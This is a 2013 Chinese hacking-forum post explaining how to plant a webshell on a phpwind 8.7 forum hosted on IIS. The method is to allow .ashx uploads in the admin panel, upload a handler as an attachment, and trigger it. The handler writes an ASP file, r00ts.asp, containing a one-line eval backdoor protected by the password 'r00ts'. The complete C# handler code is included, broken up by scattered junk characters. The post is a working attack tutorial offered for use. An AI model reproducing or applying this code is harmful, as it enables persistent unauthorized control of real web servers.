找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1968|回复: 0
打印 上一主题 下一主题

phpwind 8.7 后台拿shell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-7-26 12:41:46 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小- \6 J  d; l1 I0 j$ v! \2 t
) \7 g/ ~4 D3 x/ ]1 c( T  q+ S* S
群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx
) w+ ^! l. r2 j  d( {
% H0 r; V5 y, Y) `0 n0 M+ |' j; z发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整
% m- a3 M) C! ~) y9 `
* F/ T! |' _& d) X然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx, t) Y) r; }4 B: E- O4 x

- x2 u8 ~9 m8 q打开之后空白 会在目录底下生成r00ts.asp 密码r00ts3 N0 W$ W) S7 z2 [2 {. I+ o( K4 W, S

0 y5 I1 |# D/ j! D! g下面是代码:
. L1 B9 {: Q; Q  e# F3 m 9 r4 v$ \" A* ?' A" Y
<%@ WebHandler Language="C#"Class="Handler" %>
' H+ _5 T) L* O' ^using System;
7 d) `( Q; P/ iusing System.Web;# {6 y9 b2 w6 [3 X: H
using System.IO;
$ G  C7 b4 I& [6 n1 y7 kpublic class Handler : IHttpHandler {+ a. G$ M  }! B1 M3 A
public void ProcessRequest (HttpContext context) {
1 o6 Z8 Q, N& ]! B6 k4 rcontext.Response.ContentType = "text/plain";
1 i- `; `& W! ^0 @3 ?5 UStreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));
6 B& k6 \- _1 p+ _- P! p9 T6 ]file1.Write("<%eval request(\"r00ts\")%>");
' `! i* n( N# D2 tfile1.Flush();& J5 H6 S0 s, D3 a8 y7 r
file1.Close();4 f/ L3 x  [" h: S4 S, ^
}
1 Z9 d0 q( v5 Fpublic bool IsReusable {
; K1 Z& [4 F- y3 l, C& L. k% mget {
! J/ f( a6 v) }+ [' l2 Q, jreturn false;& W7 P: k  P2 W; y* Z
}
8 D( u5 v0 n) Y3 C! b& I& _% }}" V8 J/ T. ]# F4 |) F; H$ E- ?- k
}
2 A3 x0 }4 r* R
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表